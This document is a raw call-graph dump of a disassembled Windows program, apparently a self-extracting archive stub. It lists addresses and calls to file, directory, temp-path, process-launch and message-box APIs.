11690 40229c 11688->11690 11691 405def VariantClear 11689->11691 11876 403204 free 11690->11876 11691->11693 11883 403204 free 11693->11883 11694 4022b2 11877 403204 free 11694->11877 11696 4022ba 11878 403204 free 11696->11878 11698 4022c2 11699 410da8 free 11698->11699 11700 4022d1 11699->11700 11701 405def VariantClear 11700->11701 11702 4022d9 11701->11702 11879 403204 free 11702->11879 11705 405298 ctype FindCloseChangeNotification 11704->11705 11706 40526a 11705->11706 11707 405293 11706->11707 11708 40526e CreateFileW 11706->11708 11707->11589 11708->11707 11709->11606 11711 4031dd 2 API calls 11710->11711 11712 401f6f 11711->11712 11712->11608 11712->11609 11712->11610 11714 4037e2 11713->11714 11715 401feb 11713->11715 11714->11715 11716 4031dd 2 API calls 11714->11716 11719 405def 11715->11719 11717 4037f6 11716->11717 11884 403204 free 11717->11884 11720 405df5 11719->11720 11723 405d99 11719->11723 11720->11626 11721 405dd7 11721->11626 11722 405dc0 VariantClear 11722->11626 11723->11721 11723->11722 11725 404202 __EH_prolog 11724->11725 11885 4030d0 11725->11885 11728 40368d 2 API calls 11734 404225 11728->11734 11729 404265 11730 40382a 3 API calls 11729->11730 11731 404276 11730->11731 11733 403089 4 API calls 11731->11733 11736 404282 11733->11736 11734->11729 11889 40382a 11734->11889 11895 403089 11734->11895 11903 403204 free 11736->11903 11738 40212a 11738->11639 11739 403740 11738->11739 11917 4034e7 11739->11917 11920 4035d6 11742->11920 11744 40217a 11744->11649 11744->11650 11746 404db9 __EH_prolog 11745->11746 11750 404f81 11746->11750 11930 4036b0 11746->11930 11748 404ded 11749 4036b0 2 API calls 11748->11749 11753 404dfa 11749->11753 11751 405000 11750->11751 11752 404fb5 11750->11752 11754 40504c 11751->11754 11755 40501c 11751->11755 11813 405021 11751->11813 11963 404da0 GetFileAttributesW 11752->11963 11759 404e38 11753->11759 11934 4039d8 11753->11934 11773 4036b0 2 API calls 11754->11773 11754->11813 11758 404da0 GetFileAttributesW 11755->11758 11758->11813 11764 404e7d 11759->11764 11769 404e58 11759->11769 11762 404fe7 11765 404b27 FindClose 11762->11765 11763 404fd0 11965 40376e 11763->11965 11766 404daf 14 API calls 11764->11766 11768 4021cf 11765->11768 11767 404e85 11766->11767 11771 404f71 11767->11771 11772 404e7b 11767->11772 11768->11664 11847 404643 11768->11847 11769->11772 11775 4037d2 3 API calls 11769->11775 11961 403204 free 11771->11961 11777 403740 2 API calls 11772->11777 11776 40507c 11773->11776 11775->11772 11971 401ef8 11776->11971 11780 404eae 11777->11780 11778 404f79 11962 403204 free 11778->11962 11783 40368d 2 API calls 11780->11783 11805 404eba 11783->11805 11784 401ef8 4 API calls 11785 405094 11784->11785 11787 404b47 5 API calls 11785->11787 11788 4050a4 11787->11788 11791 4050a8 wcscmp 11788->11791 11792 4050c7 11788->11792 11789 404f06 11954 403204 free 11789->11954 11790 404efe SetLastError 11790->11789 11791->11792 11810 4050c0 11791->11810 11795 404da0 GetFileAttributesW 11792->11795 11797 4050d2 11795->11797 11796 404f48 11955 403204 free 11796->11955 11803 4050e4 11797->11803 11797->11810 11798 404f0a 11951 40399c 11798->11951 11800 40376e 3 API calls 11804 40513b 11800->11804 11802 404f50 11956 404b27 11802->11956 11975 403204 free 11803->11975 11976 403204 free 11804->11976 11805->11789 11805->11790 11805->11798 11811 40368d 2 API calls 11805->11811 11938 404d3d 11805->11938 11946 403210 11805->11946 11950 403204 free 11805->11950 11810->11800 11811->11805 11813->11762 11923 404b47 11813->11923 11814 405143 11816 404b27 FindClose 11814->11816 11816->11768 11817 404f62 11960 403204 free 11817->11960 11819->11622 11821 403892 11820->11821 11822 4038a6 11820->11822 11823 4031dd 2 API calls 11821->11823 11822->11616 11824 40389d 11823->11824 12015 403204 free 11824->12015 11826->11622 11827 4024b5 11828 4024d3 11827->11828 11829 4024c6 11827->11829 11828->11643 12016 403204 free 11829->12016 11831 4024cd 12017 403204 free 11831->12017 11834 401e9c __EH_prolog 11833->11834 11835 403740 2 API calls 11834->11835 11839 401ead 11835->11839 11836 401edf 12019 403204 free 11836->12019 11837 40399c 4 API calls 11837->11839 11839->11836 11839->11837 11842 401ef8 4 API calls 11839->11842 12018 40447d CreateDirectoryW 11839->12018 11840 401ee7 11840->11645 11842->11839 11843->11659 11845 4021a8 11844->11845 11846 40443e SetFileTime CloseHandle 11844->11846 11845->11659 11846->11845 11848 404da0 GetFileAttributesW 11847->11848 11850 40464b 11848->11850 11849 40466a DeleteFileW 11849->11670 11850->11849 12020 404462 SetFileAttributesW 11850->12020 11852 404664 11852->11849 11853 404668 11852->11853 11853->11670 11855 4038e3 11854->11855 11855->11855 11856 4031dd 2 API calls 11855->11856 11859 4021f0 11855->11859 11857 4038f9 11856->11857 12021 403204 free 11857->12021 11860 403204 free 11859->11860 11860->11659 11861->11665 11862->11639 11864 410db3 11863->11864 11865 410dd1 11863->11865 11864->11865 11868 403204 free ctype 11864->11868 12022 403204 free 11865->12022 11867 410dd9 11867->11623 11868->11864 11869->11622 11871 402244 11870->11871 11872 4031ee _CxxThrowException 11870->11872 11873 405489 11871->11873 11872->11871 12023 405472 11873->12023 11876->11694 11877->11696 11878->11698 11879->11622 11880->11676 11881->11680 11882->11684 11883->11622 11884->11715 11886 4030f9 11885->11886 11888 4030db 11885->11888 11886->11728 11886->11738 11887 403204 free ctype 11887->11888 11888->11886 11888->11887 11890 403838 11889->11890 11894 40384b 11889->11894 11891 4031dd 2 API calls 11890->11891 11892 403842 11891->11892 11904 403204 free 11892->11904 11894->11734 11896 403093 __EH_prolog 11895->11896 11897 4031dd 2 API calls 11896->11897 11898 40309e 11897->11898 11899 4030b5 11898->11899 11900 403740 2 API calls 11898->11900 11905 4088fd 11899->11905 11900->11899 11903->11738 11904->11894 11908 40b6b7 11905->11908 11909 40b6c2 11908->11909 11915 4030c1 11908->11915 11910 4031dd 2 API calls 11909->11910 11911 40b6e1 11910->11911 11912 40b6fa 11911->11912 11913 40b6eb memcpy 11911->11913 11916 403204 free 11912->11916 11913->11912 11915->11734 11916->11915 11918 4031dd 2 API calls 11917->11918 11919 402145 11918->11919 11919->11643 11919->11827 11921 4034e7 2 API calls 11920->11921 11922 4035f1 11921->11922 11922->11744 11922->11922 11924 404b27 FindClose 11923->11924 11925 404b58 11924->11925 11926 404b5c FindFirstFileW 11925->11926 11929 404b73 11925->11929 11927 404b77 11926->11927 11926->11929 11977 404b8c 11927->11977 11929->11762 11931 4036c0 11930->11931 11932 4034e7 2 API calls 11931->11932 11933 4036d3 11932->11933 11933->11748 11933->11933 11935 4039ea 11934->11935 11981 40351f 11935->11981 11937 4039f9 11937->11759 11937->11937 11939 404d42 11938->11939 11940 404d4d 11938->11940 11994 404cfa 11939->11994 11999 404c6f 11940->11999 11943 404d4b 11944 404d62 11943->11944 11945 404d69 GetLastError 11943->11945 11944->11805 11945->11944 11949 403218 11946->11949 11947 403242 11947->11805 11948 40324d CharUpperW 11948->11949 11949->11947 11949->11948 11950->11805 11952 40351f 4 API calls 11951->11952 11953 4039ad 11952->11953 11953->11789 11954->11796 11955->11802 11957 404b31 FindClose 11956->11957 11958 404b3c 11956->11958 11957->11958 11959 403204 free 11958->11959 11959->11817 11960->11768 11961->11778 11962->11750 11964 404dac 11963->11964 11964->11763 11964->11813 11966 403780 11965->11966 11967 4031dd 2 API calls 11966->11967 11968 4037a4 11966->11968 11969 40379a 11967->11969 11968->11762 12011 403204 free 11969->12011 11972 401f03 11971->11972 11973 401f08 11971->11973 12012 40350a 11972->12012 11973->11784 11975->11813 11976->11814 11978 404bca 11977->11978 11979 40376e 3 API calls 11978->11979 11980 404bea 11979->11980 11980->11929 11982 403531 11981->11982 11983 403544 11981->11983 11985 403430 11982->11985 11983->11937 11986 403485 _CxxThrowException 11985->11986 11987 40343f 11985->11987 11987->11986 11988 403447 11987->11988 11989 4031dd 2 API calls 11988->11989 11990 403452 11989->11990 11993 403204 free 11990->11993 11992 403478 11992->11983 11993->11992 11995 404d0c SetLastError 11994->11995 11997 404d16 11994->11997 11996 404d25 11995->11996 11996->11943 11997->11996 12008 404ce3 11997->12008 12000 404b27 FindClose 11999->12000 12001 404c80 12000->12001 12002 404c97 SetLastError FindFirstStreamW 12001->12002 12003 404c8d SetLastError 12001->12003 12004 404cca 12001->12004 12005 404cc5 12002->12005 12006 404cba GetLastError 12002->12006 12003->12004 12004->11943 12005->12004 12007 404ce3 3 API calls 12005->12007 12006->12004 12006->12005 12007->12004 12009 40376e 3 API calls 12008->12009 12010 404cf9 12009->12010 12010->11996 12011->11968 12013 403430 4 API calls 12012->12013 12014 40351e 12013->12014 12014->11973 12015->11822 12016->11831 12017->11828 12018->11839 12019->11840 12020->11852 12021->11859 12022->11867 12024 405455 2 API calls 12023->12024 12025 402287 12024->12025 12025->11685 12025->11686 12026 4135e0 12027 4135f5 12026->12027 12028 4135ec 12026->12028 12031 413330 12027->12031 12034 413344 12031->12034 12035 413557 12031->12035 12033 407b5c 33 API calls 12033->12034 12034->12033 12034->12035 12036 4075fa 7 API calls 12034->12036 12037 4172c0 12034->12037 12036->12034 12039 4172f5 12037->12039 12038 4175a5 memcpy 12038->12034 12039->12038 12040 4173db 12039->12040 12040->12034 12041 413803 VirtualAlloc 12042 413823 VirtualFree 12043 402e27 12048 402e43 12043->12048 12045 402e2f 12046 402e3c 12045->12046 12064 403204 free 12045->12064 12049 402e4d __EH_prolog 12048->12049 12065 402ed7 12049->12065 12051 402e70 12069 403204 free 12051->12069 12053 402e7b 12070 402d87 DeleteCriticalSection 12053->12070 12057 402e8c 12076 403204 free 12057->12076 12059 402ea6 12077 403204 free 12059->12077 12061 402eae 12078 403204 free 12061->12078 12063 402eb6 12063->12045 12064->12046 12066 402ee0 12065->12066 12067 402ee4 DestroyWindow 12065->12067 12066->12051 12068 402ef4 12067->12068 12068->12051 12069->12053 12071 418a40 ctype 2 API calls 12070->12071 12072 402d9c 12071->12072 12079 403204 free 12072->12079 12074 402da4 12075 403204 free 12074->12075 12075->12057 12076->12059 12077->12061 12078->12063 12079->12074 12080 41910c __set_app_type __p__fmode __p__commode 12081 41917b 12080->12081 12082 419183 __setusermatherr 12081->12082 12083 41918f 12081->12083 12082->12083 12092 419282 _controlfp 12083->12092 12085 419194 _initterm __getmainargs _initterm 12086 4191e8 GetStartupInfoA 12085->12086 12088 41921c GetModuleHandleA 12086->12088 12093 401014 12088->12093 12092->12085 12392 401951 GetVersionExW 12093->12392 12096 401031 12525 40b77a MessageBoxW 12096->12525 12097 401042 12394 4143e0 GetVersionExW 12097->12394 12100 40103d exit _XcptFilter 12102 40368d 2 API calls 12103 401052 12102->12103 12104 40368d 2 API calls 12103->12104 12105 40105a 12104->12105 12106 40368d 2 API calls 12105->12106 12107 401062 12106->12107 12108 40368d 2 API calls 12107->12108 12109 40106a GetCommandLineW 12108->12109 12110 4036b0 2 API calls 12109->12110 12111 401079 12110->12111 12404 403000 12111->12404 12115 401093 12116 40368d 2 API calls 12115->12116 12117 40109f 12116->12117 12411 4042c1 GetModuleFileNameW 12117->12411 12119 4010aa 12415 403ab3 12119->12415 12121 4010ba 12122 4010f3 12121->12122 12123 40376e 3 API calls 12121->12123 12419 4033ad 12122->12419 12125 4010e3 12123->12125 12129 403ab3 memmove 12125->12129 12129->12122 12130 401137 12436 4036f3 12130->12436 12131 40111e 12133 40112f 12131->12133 12526 40b77a MessageBoxW 12131->12526 12708 403204 free 12133->12708 12136 40368d 2 API calls 12144 40114f 12136->12144 12138 401890 12709 403204 free 12138->12709 12139 401337 12141 40368d 2 API calls 12139->12141 12143 401342 12141->12143 12142 40189b 12710 403204 free 12142->12710 12440 404a40 12143->12440 12144->12139 12527 403c57 12144->12527 12148 4018a3 12711 403204 free 12148->12711 12152 401354 12157 401365 12152->12157 12591 40b77a MessageBoxW 12152->12591 12153 40136d 12159 4031dd 2 API calls 12153->12159 12154 401182 12158 401193 12154->12158 12560 40b77a MessageBoxW 12154->12560 12155 40119b 12561 403f77 12155->12561 12156 4018ab 12712 403204 free 12156->12712 12169 404ace 21 API calls 12157->12169 12571 401c64 12158->12571 12173 401374 12159->12173 12165 4018b3 12713 403204 free 12165->12713 12166 403f77 2 API calls 12170 4011bb 12166->12170 12172 401867 12169->12172 12174 403f77 2 API calls 12170->12174 12705 403204 free 12172->12705 12456 40930e 12173->12456 12193 4011ce 12174->12193 12177 40186f 12706 403204 free 12177->12706 12179 40125e 12578 403204 free 12179->12578 12183 401877 12707 403204 free 12183->12707 12184 40139b 12592 40b77a MessageBoxW 12184->12592 12185 4013ac 12189 403740 2 API calls 12185->12189 12186 401269 12579 403204 free 12186->12579 12191 4013b8 12189->12191 12194 40368d 2 API calls 12191->12194 12192 401274 12580 403204 free 12192->12580 12198 40120e 12193->12198 12201 4037d2 3 API calls 12193->12201 12196 4013c3 12194->12196 12468 4024db 12196->12468 12197 40127f 12581 403204 free 12197->12581 12202 4012aa 12198->12202 12206 401220 MessageBoxW 12198->12206 12201->12198 12205 403f77 2 API calls 12202->12205 12204 401287 12582 403204 free 12204->12582 12210 4012ba 12205->12210 12206->12202 12211 401230 12206->12211 12207 401462 12505 403204 free 12207->12505 12208 4013e6 12213 40144b 12208->12213 12223 401400 12208->12223 12593 405fad 12208->12593 12215 4037d2 3 API calls 12210->12215 12568 403204 free 12211->12568 12626 403204 free 12213->12626 12214 40128f 12583 403204 free 12214->12583 12220 4012c3 12215->12220 12217 40123b 12569 403204 free 12217->12569 12585 403204 free 12220->12585 12221 40146a 12228 40368d 2 API calls 12221->12228 12223->12213 12237 40142c 12223->12237 12596 404319 12223->12596 12224 401297 12584 403204 free 12224->12584 12226 401454 12627 403204 free 12226->12627 12229 401476 12228->12229 12506 404834 GetCurrentDirectoryW 12229->12506 12230 401243 12570 403204 free 12230->12570 12233 4012cb 12234 403f77 2 API calls 12233->12234 12239 4012dd 12234->12239 12611 405e4f 12237->12611 12238 40145c 12250 404ace 21 API calls 12238->12250 12243 4037d2 3 API calls 12239->12243 12247 4012e6 12243->12247 12586 403204 free 12247->12586 12248 401490 12253 401494 12248->12253 12254 4014bb 12248->12254 12255 4017a7 12250->12255 12251 4037d2 3 API calls 12256 401424 12251->12256 12259 4018ca 6 API calls 12253->12259 12261 4014c4 12254->12261 12262 40161a 12254->12262 12694 403204 free 12255->12694 12610 403204 free 12256->12610 12258 4012ee 12265 403f77 2 API calls 12258->12265 12266 40149f 12259->12266 12263 403740 2 API calls 12261->12263 12264 401652 12262->12264 12268 40376e 3 API calls 12262->12268 12284 4014d0 12263->12284 12271 403740 2 API calls 12264->12271 12269 401300 12265->12269 12628 403204 free 12266->12628 12267 4017af 12695 403204 free 12267->12695 12274 40162c 12268->12274 12275 4037d2 3 API calls 12269->12275 12276 40165e 12271->12276 12273 401512 12279 403740 2 API calls 12273->12279 12648 405155 12274->12648 12280 401309 12275->12280 12657 4055bc 12276->12657 12277 4017b7 12696 403204 free 12277->12696 12286 40151e ShellExecuteExW 12279->12286 12587 403204 free 12280->12587 12283 4017c2 12697 403204 free 12283->12697 12284->12273 12290 40399c 4 API calls 12284->12290 12292 401604 12286->12292 12293 40155d 12286->12293 12290->12273 12291 401638 12297 40164d 12291->12297 12656 40b77a MessageBoxW 12291->12656 12647 403204 free 12292->12647 12298 40156e 12293->12298 12629 40b77a MessageBoxW 12293->12629 12294 401311 12588 403204 free 12294->12588 12295 4036b0 2 API calls 12301 401673 12295->12301 12296 4017cd 12698 403204 free 12296->12698 12303 4018ca 6 API calls 12297->12303 12630 403204 free 12298->12630 12661 403b7d 12301->12661 12311 40178c 12303->12311 12308 40131c 12589 403204 free 12308->12589 12309 401612 12510 403204 free 12309->12510 12693 403204 free 12311->12693 12312 4017d8 12699 403204 free 12312->12699 12313 401576 12631 403204 free 12313->12631 12320 401324 12590 403204 free 12320->12590 12321 40157e 12326 4018ca 6 API calls 12321->12326 12323 40168b 12670 403204 free 12323->12670 12324 40182b 12329 401841 12324->12329 12330 401831 WaitForSingleObject CloseHandle 12324->12330 12325 4017e0 12700 403204 free 12325->12700 12332 40158b 12326->12332 12327 40132c 12333 401c64 free 12327->12333 12511 4018ca 12329->12511 12330->12329 12632 403204 free 12332->12632 12333->12139 12334 401693 12338 403740 2 API calls 12334->12338 12336 4017e8 12701 403204 free 12336->12701 12342 4016a1 12338->12342 12341 401593 12633 404ace 12341->12633 12345 4036b0 2 API calls 12342->12345 12344 4017f0 12702 403204 free 12344->12702 12348 4016ae 12345->12348 12350 403b7d 8 API calls 12348->12350 12349 4015a6 12638 403204 free 12349->12638 12352 4016be 12350->12352 12671 403204 free 12352->12671 12353 4015ae 12639 403204 free 12353->12639 12356 4016c6 12358 4016e0 12356->12358 12359 4016cc 12356->12359 12357 4015b6 12640 403204 free 12357->12640 12360 403632 2 API calls 12358->12360 12672 40393c 12359->12672 12364 401721 12360->12364 12368 403740 2 API calls 12364->12368 12365 4015c1 12641 403204 free 12365->12641 12367 40399c 4 API calls 12367->12358 12370 40172d 12368->12370 12369 4015cc 12642 403204 free 12369->12642 12675 403204 free 12370->12675 12373 4015d7 12643 403204 free 12373->12643 12374 401735 CreateProcessW 12376 401806 CloseHandle 12374->12376 12377 40175f 12374->12377 12703 403204 free 12376->12703 12379 40176c 12377->12379 12676 401bae 12377->12676 12378 4015df 12644 403204 free 12378->12644 12691 403204 free 12379->12691 12381 401823 12381->12309 12385 4015e7 12645 403204 free 12385->12645 12386 401777 12692 403204 free 12386->12692 12389 40177f 12389->12297 12390 4015ef 12646 403204 free 12390->12646 12393 40102d 12392->12393 12393->12096 12393->12097 12395 4143ff 12394->12395 12396 41440e GetModuleHandleW GetProcAddress 12394->12396 12395->12396 12398 414438 GetSystemDirectoryW 12395->12398 12397 414429 12396->12397 12396->12398 12397->12398 12400 401047 12397->12400 12399 414453 12398->12399 12398->12400 12399->12400 12401 41445e lstrlenW 12399->12401 12400->12102 12402 414479 12401->12402 12402->12400 12403 4144ca lstrcatW LoadLibraryExW 12402->12403 12403->12400 12403->12402 12407 40302a 12404->12407 12409 40108b 12404->12409 12405 403075 12406 40376e 3 API calls 12405->12406 12406->12409 12407->12405 12408 401ef8 4 API calls 12407->12408 12407->12409 12408->12407 12410 403204 free 12409->12410 12410->12115 12412 4042fe 12411->12412 12414 404310 12411->12414 12413 40376e 3 API calls 12412->12413 12412->12414 12413->12414 12414->12119 12416 403abb 12415->12416 12417 403afb 12416->12417 12418 403adc memmove 12416->12418 12417->12121 12418->12417 12420 4031dd 2 API calls 12419->12420 12421 4010fe 12420->12421 12422 4019f5 12421->12422 12423 4019ff __EH_prolog 12422->12423 12714 4053b3 12423->12714 12425 401b63 12427 405298 ctype FindCloseChangeNotification 12425->12427 12426 401a2e 12426->12425 12429 401b45 12426->12429 12432 401b10 memmove 12426->12432 12433 401ab7 memcmp 12426->12433 12434 401af1 memcmp 12426->12434 12717 405410 12426->12717 12721 401b7e 12426->12721 12431 40111a 12427->12431 12430 405298 ctype FindCloseChangeNotification 12429->12430 12430->12431 12431->12130 12431->12131 12432->12426 12432->12429 12433->12426 12433->12429 12434->12426 12437 403709 12436->12437 12438 4034e7 2 API calls 12437->12438 12439 401147 12438->12439 12439->12136 12441 404a4a __EH_prolog 12440->12441 12442 404ace 21 API calls 12441->12442 12443 404a55 12442->12443 12444 401350 12443->12444 12445 40368d 2 API calls 12443->12445 12444->12152 12444->12153 12446 404a62 12445->12446 12743 4048d6 GetTempPathW 12446->12743 12449 404a72 12765 403204 free 12449->12765 12457 409318 __EH_prolog 12456->12457 12776 4094da 12457->12776 12459 401397 12459->12184 12459->12185 12461 40368d malloc _CxxThrowException 12467 409327 12461->12467 12462 4038d0 malloc _CxxThrowException free 12462->12467 12464 403204 free ctype 12464->12467 12467->12459 12467->12461 12467->12462 12467->12464 12781 40940e 12467->12781 12784 409178 12467->12784 12801 409493 12467->12801 12809 401cf9 12467->12809 12469 4024e5 __EH_prolog 12468->12469 12874 4029f9 12469->12874 12472 4037d2 3 API calls 12473 402519 12472->12473 12474 4037d2 3 API calls 12473->12474 12475 402527 12474->12475 12476 4031dd 2 API calls 12475->12476 12477 402531 12476->12477 12479 402544 12477->12479 12953 402bc1 12477->12953 12480 4025e6 12479->12480 12481 402566 12479->12481 12884 4026c1 12480->12884 12967 418a80 _beginthreadex 12481->12967 12484 402591 12486 4025a4 12484->12486 12487 402597 12484->12487 12485 4025f1 12488 4037d2 3 API calls 12485->12488 12491 40368d 2 API calls 12486->12491 12489 418a40 ctype 2 API calls 12487->12489 12490 4025ff 12488->12490 12492 40259f 12489->12492 12490->12492 12494 4037d2 3 API calls 12490->12494 12493 4025ac 12491->12493 12943 402b65 12492->12943 12495 405fad 6 API calls 12493->12495 12494->12492 12497 4025bd 12495->12497 12971 40264d 12497->12971 12500 4025d0 12982 403204 free 12500->12982 12502 4025d8 12503 418a40 ctype 2 API calls 12502->12503 12504 4025e4 12503->12504 12504->12485 12505->12221 12507 40376e 3 API calls 12506->12507 12508 401488 12507->12508 12509 404826 SetCurrentDirectoryW 12508->12509 12509->12248 12510->12324 12512 4018d4 __EH_prolog 12511->12512 12513 40368d 2 API calls 12512->12513 12523 40191c 12512->12523 12516 4018ef 12513->12516 12515 40184c 12704 403204 free 12515->12704 12517 404834 4 API calls 12516->12517 12519 4018fb 12517->12519 12518 401914 14073 403204 free 12518->14073 12519->12518 14069 401932 12519->14069 14074 403204 free 12523->14074 12525->12100 12526->12133 12528 403c61 __EH_prolog 12527->12528 14075 404015 12528->14075 12530 40117e 12530->12154 12530->12155 12531 40368d malloc _CxxThrowException 12553 403c71 12531->12553 12533 403dd7 14100 403204 free 12533->14100 12535 403ddf 14101 403204 free 12535->14101 12537 403de7 14102 403204 free 12537->14102 12539 4033ad 2 API calls 12539->12553 12540 403df4 14103 403204 free 12540->14103 12542 404045 malloc _CxxThrowException free _CxxThrowException 12542->12553 12543 403dfc 14104 403204 free 12543->14104 12545 401b7e malloc _CxxThrowException free memcpy _CxxThrowException 12545->12553 12546 403e19 14107 403204 free 12546->14107 12547 403e04 14105 403204 free 12547->14105 12551 403e0c 14106 403204 free 12551->14106 12552 403e21 14108 403204 free 12552->14108 12553->12530 12553->12531 12553->12533 12553->12539 12553->12540 12553->12542 12553->12545 12553->12546 12558 403204 free ctype 12553->12558 12559 401d5b ctype free 12553->12559 14080 403e47 12553->14080 14090 403fb4 12553->14090 12556 403e29 12557 401d5b ctype free 12556->12557 12557->12530 12558->12553 12559->12553 12560->12158 12562 403f8f 12561->12562 12563 403f93 12562->12563 12564 403f9c 12562->12564 12565 40368d 2 API calls 12563->12565 12566 403740 2 API calls 12564->12566 12567 4011ab 12565->12567 12566->12567 12567->12166 12568->12217 12569->12230 12570->12158 12572 401c6e __EH_prolog 12571->12572 12573 401c94 12572->12573 12575 401d3f ctype free 12572->12575 14117 403204 free 12573->14117 12575->12572 12576 401256 12577 403204 free 12576->12577 12577->12179 12578->12186 12579->12192 12580->12197 12581->12204 12582->12214 12583->12224 12584->12100 12585->12233 12586->12258 12587->12294 12588->12308 12589->12320 12590->12327 12591->12157 12592->12157 14118 405f4a LoadStringW 12593->14118 12597 404323 __EH_prolog 12596->12597 12598 40368d 2 API calls 12597->12598 12599 404338 12598->12599 14129 4043dc FormatMessageW 12599->14129 12601 404351 12603 403740 2 API calls 12601->12603 12604 4043c3 12603->12604 14134 403204 free 12604->14134 12606 4039d8 4 API calls 12608 4043ac 12606->12608 12607 40141b 12607->12251 12609 4039d8 4 API calls 12608->12609 12609->12601 12610->12237 14135 418d80 12611->14135 12613 405e59 LoadStringW 12614 405ea3 12613->12614 12615 405e93 12613->12615 12617 40368d 2 API calls 12614->12617 12616 4036b0 2 API calls 12615->12616 12624 401438 MessageBoxW 12616->12624 12618 405eab 12617->12618 12619 405ee5 5 API calls 12618->12619 12620 405ec0 12619->12620 12621 403740 2 API calls 12620->12621 12622 405ecb 12621->12622 14136 403204 free 12622->14136 12625 403204 free 12624->12625 12625->12213 12626->12226 12627->12238 12628->12157 12629->12298 12630->12313 12631->12321 12632->12341 12634 404ad6 12633->12634 12635 404ada 12633->12635 12634->12349 14137 404678 12635->14137 12638->12353 12639->12357 12640->12365 12641->12369 12642->12373 12643->12378 12644->12385 12645->12390 12646->12100 12647->12309 12649 40515f __EH_prolog 12648->12649 12650 40368d 2 API calls 12649->12650 12651 405176 12650->12651 12652 404daf 16 API calls 12651->12652 12653 405183 12652->12653 14210 403204 free 12653->14210 12655 401634 12655->12264 12655->12291 12656->12297 12658 401666 12657->12658 12659 4055c3 12657->12659 12658->12295 12659->12658 12660 401ef8 4 API calls 12659->12660 12660->12658 12662 401683 12661->12662 12663 403b8f 12661->12663 12669 403204 free 12662->12669 14211 403be8 12663->14211 12666 403b9b 12666->12662 14214 403a31 wcsstr 12666->14214 14216 403c09 12666->14216 14220 403b3c 12666->14220 12669->12323 12670->12334 12671->12356 12673 401ef8 4 API calls 12672->12673 12674 4016d4 12673->12674 12674->12367 12675->12374 14227 418d80 12676->14227 12678 401bb8 GetLastError 12679 404319 6 API calls 12678->12679 12680 401bcf 12679->12680 12681 403a31 wcsstr 12680->12681 12682 401be2 12681->12682 12683 401bfd 12682->12683 12684 403c09 memmove 12682->12684 14228 40b77a MessageBoxW 12683->14228 12686 401bf3 12684->12686 12691->12386 12692->12389 12693->12238 12694->12267 12695->12277 12696->12283 12697->12296 12698->12312 12699->12325 12700->12336 12701->12344 12702->12100 12703->12381 12704->12157 12705->12177 12706->12183 12707->12133 12708->12138 12709->12142 12710->12148 12711->12156 12712->12165 12713->12100 12725 405392 12714->12725 12718 40541d 12717->12718 12719 4053ee ReadFile 12718->12719 12720 405449 12718->12720 12719->12718 12720->12426 12722 401b89 12721->12722 12723 401b8e 12721->12723 12731 403398 12722->12731 12723->12426 12728 405375 12725->12728 12729 40525f 2 API calls 12728->12729 12730 40538f 12729->12730 12730->12426 12734 40331b 12731->12734 12735 403361 _CxxThrowException 12734->12735 12736 40332a 12734->12736 12736->12735 12737 403332 12736->12737 12738 4031dd 2 API calls 12737->12738 12739 40333c memcpy 12738->12739 12742 403204 free 12739->12742 12741 403352 12741->12723 12742->12741 12744 40376e 3 API calls 12743->12744 12745 404917 12744->12745 12745->12449 12746 403656 12745->12746 12747 40366c 12746->12747 12748 4035d6 2 API calls 12747->12748 12749 403685 12748->12749 12750 40492e GetCurrentThreadId GetTickCount GetCurrentProcessId 12749->12750 12752 404961 12750->12752 12751 40376e 3 API calls 12751->12752 12752->12751 12753 4039d8 4 API calls 12752->12753 12755 4049df SetLastError 12752->12755 12756 40499d 12752->12756 12757 405489 2 API calls 12752->12757 12761 404a29 12752->12761 12763 404a0a GetLastError 12752->12763 12766 4051ae 12752->12766 12774 40447d CreateDirectoryW 12752->12774 12753->12752 12755->12752 12756->12752 12758 401ef8 4 API calls 12756->12758 12760 4039d8 4 API calls 12756->12760 12757->12752 12758->12756 12762 4049b1 GetTickCount 12760->12762 12764 403204 free 12761->12764 12762->12756 12763->12752 12764->12449 12765->12444 12767 4051b8 __EH_prolog 12766->12767 12768 40368d 2 API calls 12767->12768 12769 4051cf 12768->12769 12770 404daf 16 API calls 12769->12770 12771 4051dc 12770->12771 12775 403204 free 12771->12775 12773 4051e6 12773->12752 12774->12752 12775->12773 12777 409502 12776->12777 12779 4094e5 12776->12779 12777->12467 12779->12777 12815 401cc6 12779->12815 12821 403204 free 12779->12821 12782 40368d 2 API calls 12781->12782 12783 409424 12782->12783 12783->12467 12785 409182 __EH_prolog 12784->12785 12823 409279 12785->12823 12788 409279 5 API calls 12799 4091bb 12788->12799 12789 409251 12790 410da8 free 12789->12790 12792 40925c 12790->12792 12791 40368d malloc _CxxThrowException 12791->12799 12793 410da8 free 12792->12793 12794 409268 12793->12794 12794->12467 12795 4037d2 3 API calls 12795->12799 12796 4037d2 3 API calls 12798 409202 wcscmp 12796->12798 12798->12799 12799->12789 12799->12791 12799->12795 12799->12796 12800 403204 free ctype 12799->12800 12836 409432 12799->12836 12800->12799 12802 40949d __EH_prolog 12801->12802 12803 4031dd 2 API calls 12802->12803 12804 4094a8 12803->12804 12805 4094bf 12804->12805 12847 40950a 12804->12847 12807 4088fd 4 API calls 12805->12807 12808 4094cb 12807->12808 12808->12467 12810 401d03 __EH_prolog 12809->12810 12811 401d29 12810->12811 12860 401d3f 12810->12860 12865 403204 free 12811->12865 12814 401d30 12814->12467 12816 401cd0 __EH_prolog 12815->12816 12817 401cf9 ctype free 12816->12817 12818 401ce3 12817->12818 12822 403204 free 12818->12822 12820 401ceb 12820->12779 12821->12779 12822->12820 12824 409283 __EH_prolog 12823->12824 12825 4030d0 free 12824->12825 12826 409295 12825->12826 12827 40368d 2 API calls 12826->12827 12832 40929d 12827->12832 12828 4092f6 12846 403204 free 12828->12846 12830 4092e4 12830->12828 12834 403089 4 API calls 12830->12834 12831 4091b0 12831->12788 12832->12828 12832->12830 12833 401ef8 4 API calls 12832->12833 12835 403089 4 API calls 12832->12835 12833->12832 12834->12828 12835->12832 12837 40943c __EH_prolog 12836->12837 12838 4031dd 2 API calls 12837->12838 12840 409448 12838->12840 12839 409472 12843 4088fd 4 API calls 12839->12843 12840->12839 12841 403740 2 API calls 12840->12841 12842 409462 12841->12842 12844 403740 2 API calls 12842->12844 12845 409483 12843->12845 12844->12839 12845->12799 12846->12831 12848 409514 __EH_prolog 12847->12848 12849 403740 2 API calls 12848->12849 12850 40953b 12849->12850 12853 40955d 12850->12853 12855 409567 __EH_prolog 12853->12855 12854 4095a0 12856 40954b 12854->12856 12858 4031dd 2 API calls 12854->12858 12859 403740 malloc _CxxThrowException 12854->12859 12855->12854 12857 4031dd 2 API calls 12855->12857 12856->12805 12857->12854 12858->12854 12859->12854 12866 401d5b 12860->12866 12864 401d54 